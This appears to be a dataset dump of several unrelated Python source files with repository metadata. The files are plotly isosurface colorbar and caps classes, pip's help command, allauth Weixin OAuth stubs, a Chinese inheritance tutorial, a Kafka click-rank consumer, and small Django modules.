        showtickprefix
            If "all", all tick labels are displayed with a prefix.
            If "first", only the first tick is displayed with a
            prefix. If "last", only the last tick is displayed with
            a suffix. If "none", tick prefixes are hidden.
        showticksuffix
            Same as `showtickprefix` but for tick suffixes.
        thickness
            Sets the thickness of the color bar This measure
            excludes the size of the padding, ticks and labels.
        thicknessmode
            Determines whether this color bar's thickness (i.e. the
            measure in the constant color direction) is set in
            units of plot "fraction" or in "pixels". Use
            `thickness` to set the value.
        tick0
            Sets the placement of the first tick on this axis. Use
            with `dtick`. If the axis `type` is "log", then you
            must take the log of your starting tick (e.g. to set
            the starting tick to 100, set the `tick0` to 2) except
            when `dtick`=*L<f>* (see `dtick` for more info). If the
            axis `type` is "date", it should be a date string, like
            date data. If the axis `type` is "category", it should
            be a number, using the scale where each category is
            assigned a serial number from zero in the order it
            appears.
        tickangle
            Sets the angle of the tick labels with respect to the
            horizontal. For example, a `tickangle` of -90 draws the
            tick labels vertically.
        tickcolor
            Sets the tick color.
        tickfont
            Sets the color bar's tick label font
        tickformat
            Sets the tick label formatting rule using d3 formatting
            mini-languages which are very similar to those in
            Python. For numbers, see: https://github.com/d3/d3-form
            at/blob/master/README.md#locale_format And for dates
            see: https://github.com/d3/d3-time-
            format/blob/master/README.md#locale_format We add one
            item to d3's date formatter: "%{n}f" for fractional
            seconds with n digits. For example, *2016-10-13
            09:15:23.456* with tickformat "%H~%M~%S.%2f" would
            display "09~15~23.46"
        tickformatstops
            plotly.graph_objs.isosurface.colorbar.Tickformatstop
            instance or dict with compatible properties
        tickformatstopdefaults
            When used in a template (as layout.template.data.isosur
            face.colorbar.tickformatstopdefaults), sets the default
            property values to use for elements of
            isosurface.colorbar.tickformatstops
        ticklen
            Sets the tick length (in px).
        tickmode
            Sets the tick mode for this axis. If "auto", the number
            of ticks is set via `nticks`. If "linear", the
            placement of the ticks is determined by a starting
            position `tick0` and a tick step `dtick` ("linear" is
            the default value if `tick0` and `dtick` are provided).
            If "array", the placement of the ticks is set via
            `tickvals` and the tick text is `ticktext`. ("array" is
            the default value if `tickvals` is provided).
        tickprefix
            Sets a tick label prefix.
        ticks
            Determines whether ticks are drawn or not. If "", this
            axis' ticks are not drawn. If "outside" ("inside"),
            this axis' are drawn outside (inside) the axis lines.
        ticksuffix
            Sets a tick label suffix.
        ticktext
            Sets the text displayed at the ticks position via
            `tickvals`. Only has an effect if `tickmode` is set to
            "array". Used with `tickvals`.
        ticktextsrc
            Sets the source reference on plot.ly for ticktext .
        tickvals
            Sets the values at which ticks on this axis appear.
            Only has an effect if `tickmode` is set to "array".
            Used with `ticktext`.
        tickvalssrc
            Sets the source reference on plot.ly for tickvals .
        tickwidth
            Sets the tick width (in px).
        title
            plotly.graph_objs.isosurface.colorbar.Title instance or
            dict with compatible properties
        titlefont
            Deprecated: Please use isosurface.colorbar.title.font
            instead. Sets this color bar's title font. Note that
            the title's font used to be set by the now deprecated
            `titlefont` attribute.
        titleside
            Deprecated: Please use isosurface.colorbar.title.side
            instead. Determines the location of color bar's title
            with respect to the color bar. Note that the title's
            location used to be set by the now deprecated
            `titleside` attribute.
        x
            Sets the x position of the color bar (in plot
            fraction).
        xanchor
            Sets this color bar's horizontal position anchor. This
            anchor binds the `x` position to the "left", "center"
            or "right" of the color bar.
        xpad
            Sets the amount of padding (in px) along the x
            direction.
        y
            Sets the y position of the color bar (in plot
            fraction).
        yanchor
            Sets this color bar's vertical position anchor This
            anchor binds the `y` position to the "top", "middle" or
            "bottom" of the color bar.
        ypad
            Sets the amount of padding (in px) along the y
            direction.
        """
_mapped_properties = {
'titlefont': ('title', 'font'),
'titleside': ('title', 'side')
}
def __init__(
self,
arg=None,
bgcolor=None,
bordercolor=None,
borderwidth=None,
dtick=None,
exponentformat=None,
len=None,
lenmode=None,
nticks=None,
outlinecolor=None,
outlinewidth=None,
separatethousands=None,
showexponent=None,
showticklabels=None,
showtickprefix=None,
showticksuffix=None,
thickness=None,
thicknessmode=None,
tick0=None,
tickangle=None,
tickcolor=None,
tickfont=None,
tickformat=None,
tickformatstops=None,
tickformatstopdefaults=None,
ticklen=None,
tickmode=None,
tickprefix=None,
ticks=None,
ticksuffix=None,
ticktext=None,
ticktextsrc=None,
tickvals=None,
tickvalssrc=None,
tickwidth=None,
title=None,
titlefont=None,
titleside=None,
x=None,
xanchor=None,
xpad=None,
y=None,
yanchor=None,
ypad=None,
**kwargs
):
"""
Construct a new ColorBar object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.isosurface.ColorBar
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
Sets the width (in px) or the border enclosing this
color bar.
dtick
Sets the step in-between ticks on this axis. Use with
`tick0`. Must be a positive number, or special strings
available to "log" and "date" axes. If the axis `type`
is "log", then ticks are set every 10^(n*dtick) where n
is the tick number. For example, to set a tick mark at
1, 10, 100, 1000, ... set dtick to 1. To set tick marks
at 1, 100, 10000, ... set dtick to 2. To set tick marks
at 1, 5, 25, 125, 625, 3125, ... set dtick to
log_10(5), or 0.69897000433. "log" has several special
values; "L<f>", where `f` is a positive number, gives
ticks linearly spaced in value (but not position). For
example `tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10 plus
small digits between, use "D1" (all digits) or "D2"
(only 2 and 5). `tick0` is ignored for "D1" and "D2".
If the axis `type` is "date", then you must convert the
time to milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to 86400000.0.
"date" also has special values "M<n>" gives ticks
spaced by a number of months. `n` must be a positive
integer. To set ticks on the 15th of every third month,
set `tick0` to "2000-01-15" and `dtick` to "M3". To set
ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick exponents.
For example, consider the number 1,000,000,000. If
"none", it appears as 1,000,000,000. If "e", 1e+9. If
"E", 1E+9. If "power", 1x10^9 (with 9 in a super
script). If "SI", 1G. If "B", 1B.
len
Sets the length of the color bar This measure excludes
the padding of both ends. That is, the color bar length
is this length minus the padding on both ends.
lenmode
Determines whether this color bar's length (i.e. the
measure in the color variation direction) is set in
units of plot "fraction" or in *pixels. Use `len` to
set the value.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks will be
chosen automatically to be less than or equal to
`nticks`. Has an effect only if `tickmode` is set to
"auto".
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of the
first tick is shown. If "last", only the exponent of
the last tick is shown. If "none", no exponents appear.
showticklabels
Determines whether or not the tick labels are drawn.
showtickprefix
If "all", all tick labels are displayed with a prefix.
If "first", only the first tick is displayed with a
prefix. If "last", only the last tick is displayed with
a suffix. If "none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
Sets the thickness of the color bar This measure
excludes the size of the padding, ticks and labels.
thicknessmode
Determines whether this color bar's thickness (i.e. the
measure in the constant color direction) is set in
units of plot "fraction" or in "pixels". Use
`thickness` to set the value.
tick0
Sets the placement of the first tick on this axis. Use
with `dtick`. If the axis `type` is "log", then you
must take the log of your starting tick (e.g. to set
the starting tick to 100, set the `tick0` to 2) except
when `dtick`=*L<f>* (see `dtick` for more info). If the
axis `type` is "date", it should be a date string, like
date data. If the axis `type` is "category", it should
be a number, using the scale where each category is
assigned a serial number from zero in the order it
appears.
tickangle
Sets the angle of the tick labels with respect to the
horizontal. For example, a `tickangle` of -90 draws the
tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3 formatting
mini-languages which are very similar to those in
Python. For numbers, see: https://github.com/d3/d3-form
at/blob/master/README.md#locale_format And for dates
see: https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We add one
item to d3's date formatter: "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display "09~15~23.46"
tickformatstops
plotly.graph_objs.isosurface.colorbar.Tickformatstop
instance or dict with compatible properties
tickformatstopdefaults
When used in a template (as layout.template.data.isosur
face.colorbar.tickformatstopdefaults), sets the default
property values to use for elements of
isosurface.colorbar.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto", the number
of ticks is set via `nticks`. If "linear", the
placement of the ticks is determined by a starting
position `tick0` and a tick step `dtick` ("linear" is
the default value if `tick0` and `dtick` are provided).
If "array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`. ("array" is
the default value if `tickvals` is provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If "", this
axis' ticks are not drawn. If "outside" ("inside"),
this axis' are drawn outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position via
`tickvals`. Only has an effect if `tickmode` is set to
"array". Used with `tickvals`.
ticktextsrc
Sets the source reference on plot.ly for ticktext .
tickvals
Sets the values at which ticks on this axis appear.
Only has an effect if `tickmode` is set to "array".
Used with `ticktext`.
tickvalssrc
Sets the source reference on plot.ly for tickvals .
tickwidth
Sets the tick width (in px).
title
plotly.graph_objs.isosurface.colorbar.Title instance or
dict with compatible properties
titlefont
Deprecated: Please use isosurface.colorbar.title.font
instead. Sets this color bar's title font. Note that
the title's font used to be set by the now deprecated
`titlefont` attribute.
titleside
Deprecated: Please use isosurface.colorbar.title.side
instead. Determines the location of color bar's title
with respect to the color bar. Note that the title's
location used to be set by the now deprecated
`titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction).
xanchor
Sets this color bar's horizontal position anchor. This
anchor binds the `x` position to the "left", "center"
or "right" of the color bar.
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction).
yanchor
Sets this color bar's vertical position anchor This
anchor binds the `y` position to the "top", "middle" or
"bottom" of the color bar.
ypad
Sets the amount of padding (in px) along the y
direction.
Returns
-------
ColorBar
"""
super(ColorBar, self).__init__('colorbar')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.isosurface.ColorBar
constructor must be a dict or
an instance of plotly.graph_objs.isosurface.ColorBar"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators.isosurface import (colorbar as v_colorbar)
# Initialize validators
# ---------------------
self._validators['bgcolor'] = v_colorbar.BgcolorValidator()
self._validators['bordercolor'] = v_colorbar.BordercolorValidator()
self._validators['borderwidth'] = v_colorbar.BorderwidthValidator()
self._validators['dtick'] = v_colorbar.DtickValidator()
self._validators['exponentformat'
] = v_colorbar.ExponentformatValidator()
self._validators['len'] = v_colorbar.LenValidator()
self._validators['lenmode'] = v_colorbar.LenmodeValidator()
self._validators['nticks'] = v_colorbar.NticksValidator()
self._validators['outlinecolor'] = v_colorbar.OutlinecolorValidator()
self._validators['outlinewidth'] = v_colorbar.OutlinewidthValidator()
self._validators['separatethousands'
] = v_colorbar.SeparatethousandsValidator()
self._validators['showexponent'] = v_colorbar.ShowexponentValidator()
self._validators['showticklabels'
] = v_colorbar.ShowticklabelsValidator()
self._validators['showtickprefix'
] = v_colorbar.ShowtickprefixValidator()
self._validators['showticksuffix'
] = v_colorbar.ShowticksuffixValidator()
self._validators['thickness'] = v_colorbar.ThicknessValidator()
self._validators['thicknessmode'] = v_colorbar.ThicknessmodeValidator()
self._validators['tick0'] = v_colorbar.Tick0Validator()
self._validators['tickangle'] = v_colorbar.TickangleValidator()
self._validators['tickcolor'] = v_colorbar.TickcolorValidator()
self._validators['tickfont'] = v_colorbar.TickfontValidator()
self._validators['tickformat'] = v_colorbar.TickformatValidator()
self._validators['tickformatstops'
] = v_colorbar.TickformatstopsValidator()
self._validators['tickformatstopdefaults'
] = v_colorbar.TickformatstopValidator()
self._validators['ticklen'] = v_colorbar.TicklenValidator()
self._validators['tickmode'] = v_colorbar.TickmodeValidator()
self._validators['tickprefix'] = v_colorbar.TickprefixValidator()
self._validators['ticks'] = v_colorbar.TicksValidator()
self._validators['ticksuffix'] = v_colorbar.TicksuffixValidator()
self._validators['ticktext'] = v_colorbar.TicktextValidator()
self._validators['ticktextsrc'] = v_colorbar.TicktextsrcValidator()
self._validators['tickvals'] = v_colorbar.TickvalsValidator()
self._validators['tickvalssrc'] = v_colorbar.TickvalssrcValidator()
self._validators['tickwidth'] = v_colorbar.TickwidthValidator()
self._validators['title'] = v_colorbar.TitleValidator()
self._validators['x'] = v_colorbar.XValidator()
self._validators['xanchor'] = v_colorbar.XanchorValidator()
self._validators['xpad'] = v_colorbar.XpadValidator()
self._validators['y'] = v_colorbar.YValidator()
self._validators['yanchor'] = v_colorbar.YanchorValidator()
self._validators['ypad'] = v_colorbar.YpadValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('bgcolor', None)
self['bgcolor'] = bgcolor if bgcolor is not None else _v
_v = arg.pop('bordercolor', None)
self['bordercolor'] = bordercolor if bordercolor is not None else _v
_v = arg.pop('borderwidth', None)
self['borderwidth'] = borderwidth if borderwidth is not None else _v
_v = arg.pop('dtick', None)
self['dtick'] = dtick if dtick is not None else _v
_v = arg.pop('exponentformat', None)
self['exponentformat'
] = exponentformat if exponentformat is not None else _v
_v = arg.pop('len', None)
self['len'] = len if len is not None else _v
_v = arg.pop('lenmode', None)
self['lenmode'] = lenmode if lenmode is not None else _v
_v = arg.pop('nticks', None)
self['nticks'] = nticks if nticks is not None else _v
_v = arg.pop('outlinecolor', None)
self['outlinecolor'] = outlinecolor if outlinecolor is not None else _v
_v = arg.pop('outlinewidth', None)
self['outlinewidth'] = outlinewidth if outlinewidth is not None else _v
_v = arg.pop('separatethousands', None)
self['separatethousands'
] = separatethousands if separatethousands is not None else _v
_v = arg.pop('showexponent', None)
self['showexponent'] = showexponent if showexponent is not None else _v
_v = arg.pop('showticklabels', None)
self['showticklabels'
] = showticklabels if showticklabels is not None else _v
_v = arg.pop('showtickprefix', None)
self['showtickprefix'
] = showtickprefix if showtickprefix is not None else _v
_v = arg.pop('showticksuffix', None)
self['showticksuffix'
] = showticksuffix if showticksuffix is not None else _v
_v = arg.pop('thickness', None)
self['thickness'] = thickness if thickness is not None else _v
_v = arg.pop('thicknessmode', None)
self['thicknessmode'
] = thicknessmode if thicknessmode is not None else _v
_v = arg.pop('tick0', None)
self['tick0'] = tick0 if tick0 is not None else _v
_v = arg.pop('tickangle', None)
self['tickangle'] = tickangle if tickangle is not None else _v
_v = arg.pop('tickcolor', None)
self['tickcolor'] = tickcolor if tickcolor is not None else _v
_v = arg.pop('tickfont', None)
self['tickfont'] = tickfont if tickfont is not None else _v
_v = arg.pop('tickformat', None)
self['tickformat'] = tickformat if tickformat is not None else _v
_v = arg.pop('tickformatstops', None)
self['tickformatstops'
] = tickformatstops if tickformatstops is not None else _v
_v = arg.pop('tickformatstopdefaults', None)
self[
'tickformatstopdefaults'
] = tickformatstopdefaults if tickformatstopdefaults is not None else _v
_v = arg.pop('ticklen', None)
self['ticklen'] = ticklen if ticklen is not None else _v
_v = arg.pop('tickmode', None)
self['tickmode'] = tickmode if tickmode is not None else _v
_v = arg.pop('tickprefix', None)
self['tickprefix'] = tickprefix if tickprefix is not None else _v
_v = arg.pop('ticks', None)
self['ticks'] = ticks if ticks is not None else _v
_v = arg.pop('ticksuffix', None)
self['ticksuffix'] = ticksuffix if ticksuffix is not None else _v
_v = arg.pop('ticktext', None)
self['ticktext'] = ticktext if ticktext is not None else _v
_v = arg.pop('ticktextsrc', None)
self['ticktextsrc'] = ticktextsrc if ticktextsrc is not None else _v
_v = arg.pop('tickvals', None)
self['tickvals'] = tickvals if tickvals is not None else _v
_v = arg.pop('tickvalssrc', None)
self['tickvalssrc'] = tickvalssrc if tickvalssrc is not None else _v
_v = arg.pop('tickwidth', None)
self['tickwidth'] = tickwidth if tickwidth is not None else _v
_v = arg.pop('title', None)
self['title'] = title if title is not None else _v
_v = arg.pop('titlefont', None)
_v = titlefont if titlefont is not None else _v
if _v is not None:
self['titlefont'] = _v
_v = arg.pop('titleside', None)
_v = titleside if titleside is not None else _v
if _v is not None:
self['titleside'] = _v
_v = arg.pop('x', None)
self['x'] = x if x is not None else _v
_v = arg.pop('xanchor', None)
self['xanchor'] = xanchor if xanchor is not None else _v
_v = arg.pop('xpad', None)
self['xpad'] = xpad if xpad is not None else _v
_v = arg.pop('y', None)
self['y'] = y if y is not None else _v
_v = arg.pop('yanchor', None)
self['yanchor'] = yanchor if yanchor is not None else _v
_v = arg.pop('ypad', None)
self['ypad'] = ypad if ypad is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Caps(_BaseTraceHierarchyType):
    """Cap faces of an isosurface along the x, y and z axes.

    Each axis exposes a caps-settings object (or a compatible dict)
    whose supported properties are `fill` and `show`.
    """

    # x
    # -
    @property
    def x(self):
        """Cap settings for the x axis.

        May be given as an instance of
        plotly.graph_objs.isosurface.caps.X or as a dict of
        string/value properties (`fill`, `show`) passed to the X
        constructor.

        Returns
        -------
        plotly.graph_objs.isosurface.caps.X
        """
        return self['x']

    @x.setter
    def x(self, val):
        self['x'] = val

    # y
    # -
    @property
    def y(self):
        """Cap settings for the y axis.

        May be given as an instance of
        plotly.graph_objs.isosurface.caps.Y or as a dict of
        string/value properties (`fill`, `show`) passed to the Y
        constructor.

        Returns
        -------
        plotly.graph_objs.isosurface.caps.Y
        """
        return self['y']

    @y.setter
    def y(self, val):
        self['y'] = val

    # z
    # -
    @property
    def z(self):
        """Cap settings for the z axis.

        May be given as an instance of
        plotly.graph_objs.isosurface.caps.Z or as a dict of
        string/value properties (`fill`, `show`) passed to the Z
        constructor.

        Returns
        -------
        plotly.graph_objs.isosurface.caps.Z
        """
        return self['z']

    @z.setter
    def z(self, val):
        self['z'] = val

    # property parent name
    # --------------------
    @property
    def _parent_path_str(self):
        # Dotted location of this object's parent within the figure.
        return 'isosurface'

    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        return """\
        x
            plotly.graph_objs.isosurface.caps.X instance or dict
            with compatible properties
        y
            plotly.graph_objs.isosurface.caps.Y instance or dict
            with compatible properties
        z
            plotly.graph_objs.isosurface.caps.Z instance or dict
            with compatible properties
        """

    def __init__(self, arg=None, x=None, y=None, z=None, **kwargs):
        """Construct a new Caps object.

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of plotly.graph_objs.isosurface.Caps
        x
            plotly.graph_objs.isosurface.caps.X instance or dict
            with compatible properties
        y
            plotly.graph_objs.isosurface.caps.Y instance or dict
            with compatible properties
        z
            plotly.graph_objs.isosurface.caps.Z instance or dict
            with compatible properties

        Returns
        -------
        Caps
        """
        super(Caps, self).__init__('caps')

        # Normalize `arg` into a plain dict we can safely pop from.
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.isosurface.Caps 
constructor must be a dict or 
an instance of plotly.graph_objs.isosurface.Caps"""
            )

        # Honor skip_invalid only for the duration of construction.
        self._skip_invalid = kwargs.pop('skip_invalid', False)

        # Per-property validators.
        from plotly.validators.isosurface import (caps as v_caps)

        self._validators['x'] = v_caps.XValidator()
        self._validators['y'] = v_caps.YValidator()
        self._validators['z'] = v_caps.ZValidator()

        # Explicit keyword arguments win over values carried in `arg`.
        for prop, explicit in (('x', x), ('y', y), ('z', z)):
            fallback = arg.pop(prop, None)
            self[prop] = explicit if explicit is not None else fallback

        # Anything left in `arg`, plus extra kwargs, goes through the
        # generic (possibly skip_invalid-aware) handling.
        self._process_kwargs(**dict(arg, **kwargs))

        # Reset skip_invalid
        self._skip_invalid = False
from plotly.graph_objs.isosurface import slices
from plotly.graph_objs.isosurface import hoverlabel
from plotly.graph_objs.isosurface import colorbar
from plotly.graph_objs.isosurface import caps
| [
"[email protected]"
] | |
e4542b8b5cbb4bef96ff785702f56111f3fe58f4 | 768058e7f347231e06a28879922690c0b6870ed4 | /venv/lib/python3.7/site-packages/pip-10.0.1-py3.7.egg/pip/_internal/commands/help.py | 386278cf5f1461bd429c082c29df90b3b868a0cf | [] | no_license | jciech/HeisenbergSpinChains | 58b4238281d8c158b11c6c22dd0da82025fd7284 | e43942bbd09f6675e7e2ff277f8930dc0518d08e | refs/heads/master | 2022-12-18T08:04:08.052966 | 2020-09-29T12:55:00 | 2020-09-29T12:55:00 | 258,476,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py | from __future__ import absolute_import
from pip._internal.basecommand import SUCCESS, Command
from pip._internal.exceptions import CommandError
class HelpCommand(Command):
    """Show help for commands"""
    name = 'help'
    usage = """
      %prog <command>"""
    summary = 'Show help for commands.'
    ignore_require_venv = True

    def run(self, options, args):
        """Print detailed help for the command named in ``args[0]``."""
        from pip._internal.commands import commands_dict, get_similar_commands

        # 'pip help' with no args is handled by pip.__init__.parseopt(),
        # so an empty argument list simply succeeds here.
        if not args:
            return SUCCESS
        cmd_name = args[0]  # the command we need help for

        if cmd_name not in commands_dict:
            guess = get_similar_commands(cmd_name)
            parts = ['unknown command "%s"' % cmd_name]
            if guess:
                parts.append('maybe you meant "%s"' % guess)
            raise CommandError(' - '.join(parts))

        # Instantiate the command and delegate to its option parser.
        commands_dict[cmd_name]().parser.print_help()
        return SUCCESS
| [
"[email protected]"
] | |
6383c420b4d765598ded8fa8b7e09a41780ee859 | 5761eca23af5ad071a9b15e2052958f2c9de60c0 | /generated-stubs/allauth/socialaccount/providers/weixin/views.pyi | ab4087168efbf7f077d1dc53cf0dcb35eb434d7a | [] | no_license | d-kimuson/drf-iframe-token-example | 3ed68aa4463531f0bc416fa66d22ee2aaf72b199 | dd4a1ce8e38de9e2bf90455e3d0842a6760ce05b | refs/heads/master | 2023-03-16T13:52:45.596818 | 2021-03-09T22:09:49 | 2021-03-09T22:09:49 | 346,156,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | pyi | from .client import WeixinOAuth2Client as WeixinOAuth2Client
from .provider import WeixinProvider as WeixinProvider
from allauth.account import app_settings as app_settings
from allauth.socialaccount.providers.oauth2.views import OAuth2Adapter as OAuth2Adapter, OAuth2CallbackView as OAuth2CallbackView, OAuth2LoginView as OAuth2LoginView
from allauth.utils import build_absolute_uri as build_absolute_uri
from typing import Any
class WeixinOAuth2Adapter(OAuth2Adapter):
    # OAuth2 adapter for the WeChat (Weixin) provider (type stub only).
    provider_id: Any = ...
    access_token_url: str = ...
    profile_url: str = ...
    @property
    def authorize_url(self): ...
    def complete_login(self, request: Any, app: Any, token: Any, **kwargs: Any): ...
class WeixinOAuth2ClientMixin:
    # Supplies a WeixinOAuth2Client instead of the generic OAuth2 client.
    def get_client(self, request: Any, app: Any): ...
class WeixinOAuth2LoginView(WeixinOAuth2ClientMixin, OAuth2LoginView): ...
class WeixinOAuth2CallbackView(WeixinOAuth2ClientMixin, OAuth2CallbackView): ...
# Module-level view callables exported for URL configuration.
oauth2_login: Any
oauth2_callback: Any
| [
"[email protected]"
] | |
5ac9b4d7308eaba4eff0b9657389f4c3652b5b94 | ebdeaa70f6e30abab03a1589bcdd56d1339151ef | /day14Python对象3/02-添加子类属性.py | e7ac08d531ca166a266198f0171a8931da24f600 | [] | no_license | gilgameshzzz/learn | 490d8eb408d064473fdbfa3f1f854c2f163a7ef6 | d476af77a6163ef4f273087582cbecd7f2ec15e6 | refs/heads/master | 2020-03-31T11:32:42.909453 | 2018-11-22T03:34:45 | 2018-11-22T03:34:45 | 152,181,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,547 | py | # Filename : 02-添加子类属性.py
# Date : 2018/8/2
"""
对象属性的继承:是通过继承init方法来继承的对象属性
给当前类添加对象属性:重写init方法,如果需要保留父类的对象属性,需要使用
super()去调用父类的init方法
多态:同一个事物有多种形态,子类继承父类的方法,可以对方法进行重写,
一个方法就有多种形态(多态的表现)
类的多态:继承产生多态
"""
class Person:
    """A person with a name and an age."""

    def __init__(self, name='', age=2):
        # Defaults mirror the original lesson code.
        self.name, self.age = name, age
class Staff(Person):
    """A staff member: a Person whose salary starts at zero."""

    # The init parameters let certain attributes be set at creation
    # time; the rest of the Person attributes keep their defaults.
    def __init__(self, name):
        super().__init__(name)
        self.salary = 0
if __name__ == '__main__':
    # Fix: build the object in one step instead of creating a default
    # Person and then re-invoking __init__ by hand (same output).
    s1 = Person('wd', 12)
    print(s1.name, s1.age)
# 练习
"""
声明人类,有属性,名字、年龄、性别。身高
要求创建人的对象的时候可以给名字、性别、年龄赋初值
再创建学生类继承自人类,拥有人类的所有的属性,再添加学号、
成绩、电话属性
要求创建学生对象的时候可以给名字、年龄和电话赋初值
"""
class Human:
    """Exercise class: a human with name, age, sex and height."""

    def __init__(self, name, age=0, sex='男'):
        # Attribute creation order matches the original definition;
        # height is not settable at construction time.
        self.name, self.height, self.age, self.sex = name, 0, age, sex
class Student(Human):
    """A student: a Human with a student id, score and phone number."""

    def __init__(self, name, age, tel):
        # Fix 1: super().__init__ must not be passed `self` explicitly —
        # the original call raised TypeError (5 args incl. implicit self).
        super().__init__(name, age)
        self.score = 0
        self.id_num = 0
        # Fix 2: store the `tel` argument instead of the literal 13.
        self.tel = tel
| [
"[email protected]"
] | |
2d1003eb12e4578cbb09e2a2b23226e356bffd3e | 80c8d4e84f2ea188a375ff920a4adbd9edaed3a1 | /bigdata_study/pyflink1.x/pyflink_learn/examples/4_window/sink_monitor.py | f9435ee7aaed197828b8fafad6f66d9fa6cace97 | [
"MIT"
] | permissive | Birkid/penter | 3a4b67801d366db15ca887c31f545c8cda2b0766 | 0200f40c9d01a84c758ddcb6a9c84871d6f628c0 | refs/heads/master | 2023-08-22T14:05:43.106499 | 2021-10-20T07:10:10 | 2021-10-20T07:10:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | """
读取 kafka 的用户操作数据并打印
"""
from kafka import KafkaConsumer
from reprint import output
import json
topic = 'click_rank'
bootstrap_servers = ['localhost:9092']
group_id = 'group7'

consumer = KafkaConsumer(
    topic,  # topic name to subscribe to
    group_id=group_id,  # consumer-group this instance belongs to; optional
    bootstrap_servers=bootstrap_servers,  # Kafka broker addresses
    auto_offset_reset='latest',  # 'smallest': 'earliest', 'largest': 'latest'
)

# Live terminal display: 22 reusable lines updated in place.
with output(output_type="list", initial_len=22, interval=0) as output_lines:
    # Initialize the two section-header lines of the display.
    output_lines[0] = '=== 男 ==='
    output_lines[6] = '=== 女 ==='
    for msg in consumer:
        # Parse the incoming record.
        # NOTE(review): assumes msg.value is JSON with 'sex' and 'top10'
        # fields, where 'top10' is a comma-joined list of one-key dicts —
        # confirm against the producing Flink job.
        data = json.loads(msg.value)
        start_index = 1 if data['sex'] == '男' else 7
        rank = json.loads('[' + data['top10'] + ']')
        # Print the top-5 entries line by line, blanking unused rows.
        for i in range(5):
            index = start_index + i
            if i < len(rank):
                name = list(rank[i].keys())[0]
                value = list(rank[i].values())[0]
                output_lines[index] = f'{name:6s} {value}'
            else:
                output_lines[index] = ''
| [
"[email protected]"
] | |
25a39bfe0961decc5e8a5665dfe83a66b05dbd27 | 18430833920b3193d2f26ed526ca8f6d7e3df4c8 | /src/notifications/context_processors.py | f80de60ee43e53ffde101052edf945953ac0c19e | [
"MIT"
] | permissive | providenz/phase | ed8b48ea51d4b359f8012e603b328adf13d5e535 | b0c46a5468eda6d4eae7b2b959c6210c8d1bbc60 | refs/heads/master | 2021-01-17T06:56:07.842719 | 2016-06-28T11:17:53 | 2016-06-28T11:17:53 | 47,676,508 | 0 | 0 | null | 2015-12-09T07:45:19 | 2015-12-09T07:45:18 | null | UTF-8 | Python | false | false | 991 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib.auth.models import AnonymousUser
from django.conf import settings
from notifications.models import Notification
def notifications(request):
    """Provide the latest notifications for the navigation menu.

    Returns a context with the most recent notifications of the
    current user and a flag telling whether the newest one is still
    unseen. Anonymous users get an empty context.
    """
    user = getattr(request, 'user')
    context = {}
    if isinstance(user, AnonymousUser):
        return context

    qs = Notification.objects \
        .filter(user=user) \
        .order_by('-created_on')
    latest = list(qs[0:settings.DISPLAY_NOTIFICATION_COUNT])

    # Newest-first ordering: only the first entry decides "new".
    has_new = bool(latest) and not latest[0].seen
    context.update({
        'notifications': latest,
        'has_new_notifications': has_new,
    })
    return context
| [
"[email protected]"
] | |
e270360c2e7314eb2a69a82872043984e52ce1b4 | 70ba2c6f45bf036cf8e2860003ee03ef2de7842c | /apps/registro_hora_extra/models.py | c2e70f1ef58c47a87e4baec3d3f2f58225e2e7a5 | [] | no_license | Izaiasjun1Dev/gestao_rh | b99d0ba767ad136ba596c8da388ec184e19b5aae | 29830e5d7e1eed5eec93548ee31b19a4c6d62797 | refs/heads/master | 2022-01-26T00:57:10.561760 | 2019-07-31T17:56:25 | 2019-07-31T17:56:25 | 199,683,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | from django.db import models
class Registro_Hora_Extra(models.Model):
    """Overtime record: stores the justification for the extra hours."""

    # Free-text reason for the overtime entry.
    motivo = models.CharField(max_length=100)

    def __str__(self):
        # Shown in the Django admin and anywhere the object is rendered.
        return self.motivo
"[email protected]"
] | |
